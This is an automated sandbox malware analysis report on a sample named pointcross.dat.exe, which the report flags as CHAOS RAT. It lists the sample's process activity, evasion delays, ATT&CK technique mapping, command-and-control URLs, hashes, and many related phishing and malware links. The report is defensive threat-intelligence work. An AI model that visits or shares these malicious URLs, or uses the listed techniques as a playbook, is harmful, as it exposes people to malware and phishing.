Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1353			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1646			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004	Thread sleep count: 1353 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004	Thread sleep count: 1646 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: pointcross.dat.exe, 00000000.00000002.2876999518.000001DCB8F18000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\pointcross.dat.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST"			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /query /tn Orchestrator Cache Storage /v /fo LIST			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\pointcross.dat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected CHAOS RAT

Source: Yara match	File source: 0.2.pointcross.dat.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2873194373.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pointcross.dat.exe PID: 6684, type: MEMORYSTR

Remote Access Functionality

Yara detected CHAOS RAT

Source: Yara match	File source: 0.2.pointcross.dat.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2873194373.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pointcross.dat.exe PID: 6684, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Modify Registry	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	3 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Scheduled Transfer	4 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pointcross.dat.exe	5%	ReversingLabs
pointcross.dat.exe	15%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthLoopback	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/healtha	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthhttp://213.183.63.99:8080/healthLoop	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/health	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/s0	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/client	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthLoopback	1%	Virustotal		Browse
http://213.183.63.99:8080/	1%	Virustotal		Browse
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthMon	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/device	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/deviceMon	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/healthMon	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/healthLoopback	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/health	0%	Avira URL Cloud	safe
http://213.183.63.99:8080/device	1%	Virustotal		Browse
http://213.183.63.99:8080/healthMon	1%	Virustotal		Browse
http://213.183.63.99:8080/deviceMon	1%	Virustotal		Browse
http://213.183.63.99:8080/client	1%	Virustotal		Browse
http://213.183.63.99:8080/health	1%	Virustotal		Browse
http://213.183.63.99:8080/healthLoopback	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cloudflare.com	104.16.133.229	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cloudflare.com/cdn-cgi/trace	false		high
http://213.183.63.99:8080/client	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/device	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/health	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthLoopback	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000010000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthhttp://213.183.63.99:8080/healthLoop	pointcross.dat.exe, 00000000.00000002.2876349228.000000C00041C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000106000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/healtha	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000010000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/health	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000268000.00000004.00001000.00020000.00000000.sdmp, pointcross.dat.exe, 00000000.00000002.2873977324.000000C0003E4000.00000004.00001000.00020000.00000000.sdmp, pointcross.dat.exe, 00000000.00000002.2873977324.000000C00036E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/s0	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000106000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthMon	pointcross.dat.exe, 00000000.00000002.2873977324.000000C0003E4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/deviceMon	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000010000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cloudflare.com/cdn-cgi/tracestrings.Builder.Grow:	pointcross.dat.exe, 00000000.00000002.2873194373.00000000008F1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://213.183.63.99:8080/healthMon	pointcross.dat.exe, 00000000.00000002.2873977324.000000C000096000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://213.183.63.99:8080/healthLoopback	pointcross.dat.exe, 00000000.00000002.2873977324.000000C00031E000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.183.63.99	unknown	Lithuania		56630	MELBICOM-EU-ASMelbikomasUABNL	true
104.16.133.229	cloudflare.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1348350
Start date and time:	2023-11-27 10:11:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	pointcross.dat.exe
Detection:	MAL
Classification:	mal72.troj.winEXE@6/4@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.16.133.229	https://clck.ru/PYnLc	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js
	http://ec2-52-56-163-155.eu-west-2.compute.amazonaws.com/btnm	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/3.1.0/css/font-awesome.min.css
	https://j.mp/2VyKmPO	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js
	http://boucherbuilding.com/wp-includes/sodium_compat/src/archives.php/sfryd/vcd/?sense=11wpx2z0ave0vy	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js
	https://bit.ly/2ZZiYNS	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js
	https://clck.ru/NksHs	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js
	https://v.ht/difD	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudflare.com	http://multiotpfactors0ff.info/	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://llive.com.au/4ddd44d6e5ec0d15bcb13849cd549ef265640d63c92e3LOG4ddd44d6e5ec0d15bcb13849cd549ef265640d63c92e6	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://slaterbuilder-my.sharepoint.com/:f:/g/personal/kking_slaterbuilders_com/Ev1uqlMbotVBq1_qOAAWwnkB0TD4k9N2Z17hefLNNdFL5w?e=joImZC	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.3.184
	https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html	Get hash	malicious	GRQ Scam, Phisher	Browse	35.190.80.1
	https://docs.google.com/presentation/d/e/2PACX-1vSoH_qAnDNHwvYXYGy3UfFLI1VYhFGLdHalyv7M40yruQWw_ME0GhB8Xhr6qqw-3eSRn-irERYgl3Sv/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.3.184
	https://objectstorage.ap-sydney-1.oraclecloud.com/n/idrlconj5yne/b/ndfnmdfmdsds/o/login.microsoftonline.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://objectstorage.us-phoenix-1.oraclecloud.com/n/axlhys9btmq8/b/vmexpress/o/leoleo.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-4c6662782926434588effff825b1eb1a.r2.dev/auths.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://objectstorage.us-ashburn-1.oraclecloud.com/n/idgugmx9n3oo/b/bucket-20230111-0827/o/server%20(4).html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://alisalomon92.000webhostapp.com/	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://stecmcommunity.com/prof/78920478190328132212	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://ai-voice-a791.sr-171.workers.dev/	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://adobe-us-updatefiles.digital	Get hash	malicious	Unknown	Browse	35.190.80.1
	http://Hamas.com	Get hash	malicious	Unknown	Browse	35.190.80.1
	https://pub-9abe9cd3126b4701a0567f649282a16d.r2.dev/Indexx.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://pub-f2a7a6151b8e45fa9c87891a1b3af4cb.r2.dev/new.html?email=a21pbgxlckbtam1pbgxlcmnvlmnvbq==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://go2cup.com/gonow-auth	Get hash	malicious	Unknown	Browse	35.190.80.1
	https://sei.d955503313d5.space/p/redi.4ae61c3f5ad7.space/ZnVqjDpDtiijW6qabYSd87uArvjxCMGe9Heqpp1hBFGWRxqtJb4UT/123/f.eeee48295dd7.space/chunklist_hd.m3u8	Get hash	malicious	Unknown	Browse	35.190.80.1
	12.exe	Get hash	malicious	Njrat	Browse	104.17.2.184

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PRICE_LIST_FOR_NEW_QUOTE.EXE.exe	Get hash	malicious	FormBook	Browse	172.67.214.17
	file.exe	Get hash	malicious	DarkTortilla, Djvu, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	162.159.134.233
	Quotation_Reference_No_DX2265.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	1Y3gZBfpAEHOoYa.exe	Get hash	malicious	FormBook	Browse	104.21.88.235
	GImsmLZNVg.exe	Get hash	malicious	DCRat, zgRAT	Browse	172.67.129.42
	INVOICE0986543009070.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	DarkTortilla, Djvu, Glupteba, RedLine, SmokeLoader	Browse	104.21.65.24
	SecuriteInfo.com.Win32.PWSX-gen.29998.25521.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://multiotpfactors0ff.info/	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	tx6lJfVP3c.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	104.21.6.189
	https://llive.com.au/4ddd44d6e5ec0d15bcb13849cd549ef265640d63c92e3LOG4ddd44d6e5ec0d15bcb13849cd549ef265640d63c92e6	Get hash	malicious	Unknown	Browse	104.17.2.184
	dFagySOU5B.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	172.67.135.47
	https://slaterbuilder-my.sharepoint.com/:f:/g/personal/kking_slaterbuilders_com/Ev1uqlMbotVBq1_qOAAWwnkB0TD4k9N2Z17hefLNNdFL5w?e=joImZC	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	1.1.1.1
	https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html	Get hash	malicious	GRQ Scam, Phisher	Browse	104.21.1.7
	https://docs.google.com/presentation/d/e/2PACX-1vSoH_qAnDNHwvYXYGy3UfFLI1VYhFGLdHalyv7M40yruQWw_ME0GhB8Xhr6qqw-3eSRn-irERYgl3Sv/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	file.exe	Get hash	malicious	DarkTortilla, Djvu, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	104.21.65.24
	aXCZLdgtmG.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	104.21.6.189
	latest.apk	Get hash	malicious	Irata	Browse	104.19.192.177
	J7KkkQ9RRb.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig, zgRAT	Browse	104.21.6.189
	https://objectstorage.ap-sydney-1.oraclecloud.com/n/idrlconj5yne/b/ndfnmdfmdsds/o/login.microsoftonline.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
MELBICOM-EU-ASMelbikomasUABNL	https://girisler.com/corpnetb.ndsav/	Get hash	malicious	Unknown	Browse	194.59.142.114
	sahamedalat.apk	Get hash	malicious	Irata	Browse	31.40.216.202
	08274199.exe	Get hash	malicious	Glupteba	Browse	194.59.46.2
	http://freeganpulriefreezre.tk	Get hash	malicious	Unknown	Browse	88.218.242.3
	n1nAOKUE2T.exe	Get hash	malicious	Remcos	Browse	213.183.58.19
	AF35fGHGm4.exe	Get hash	malicious	Remcos	Browse	213.183.58.19
	Czheg4aceS.exe	Get hash	malicious	Remcos	Browse	213.183.58.19
	eTQPk3gwjv.dll	Get hash	malicious	Wannacry	Browse	185.246.153.91
	RAK6aQyp7c.dll	Get hash	malicious	Wannacry	Browse	213.183.54.220
	ASNQgoDsYv.dll	Get hash	malicious	Wannacry	Browse	213.183.55.249
	http://refpaicctvtm.top	Get hash	malicious	Unknown	Browse	45.150.232.198
	9nRdO4MVpB	Get hash	malicious	Mirai	Browse	185.246.153.43
	dAUDXNXEoZ	Get hash	malicious	Mirai	Browse	185.246.153.97
	crypted_loader_dll_64Donat_5.dll	Get hash	malicious	Ursnif	Browse	213.183.56.140
	payslip_ord-76357827.xlsb	Get hash	malicious	Hidden Macro 4.0 Ursnif Ursnif v3	Browse	213.183.56.140
	xIOggpNWfl.exe	Get hash	malicious	BitRAT	Browse	185.246.152.22
	uyw4zvh8Qq	Get hash	malicious	Mirai	Browse	192.71.26.94
	m.exe	Get hash	malicious	Unknown	Browse	213.183.53.166
	YwZpT3p5Rh.msi	Get hash	malicious	Unknown	Browse	213.226.71.164
	mpjA0y4VMf.exe	Get hash	malicious	RedLine	Browse	213.226.71.125

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.7307872139132228
Encrypted:	false
SSDEEP:	3:Nlllul:NllU
MD5:	6DA15BE18F0DF00B9DC2DC6B72B103F2
SHA1:	4ADB8B407D51A20952CB8E4EC0349D742862B568
SHA-256:	19704E2940D1D9E46CF80F36AAB157098B0A8C61865C087167F9AFA9A9F70352
SHA-512:	5BF5FF5A02FA55C13D6DD266361F8DD2747DD657ABF21032E7DD3E9C28D65A3E9CB88F5AE7E6F2029E9FC37D5EA90C020F6423092C84DE41A2AD7E0DCBC72EB4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2baze5bb.p2q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
